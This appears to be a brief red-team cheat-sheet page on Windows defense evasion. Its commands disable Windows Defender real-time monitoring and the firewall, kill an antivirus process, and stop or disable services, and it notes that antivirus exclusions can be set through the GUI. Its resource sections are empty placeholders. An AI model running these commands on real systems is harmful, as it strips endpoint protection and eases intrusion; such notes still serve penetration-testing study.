Secondary Categories: 02-Defense Evasion

Basic Commands

# Disable real-time monitoring for Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
 
# Disable Windows firewall
netsh advfirewall set allprofiles state off
 
# Manually disable antivirus 
taskkill /F /IM avprocess.exe
 
# Stop an antivirus service
net stop "$service_name"
 
# Disable a Windows service
sc config "service name" start= disabled

Disable Antivirus via GUI

If the user is has permissions to modify the AV settings you can set exclusions on directories or file to ignore when scanning.

  • Cisco AMP
  • Windows Defender

You may also be able to view the list of exclusions on some antivirus/EDR endpoints too


Resources:

TitleURL
placeholder

Also Check Out:

  • PLACEHOLDER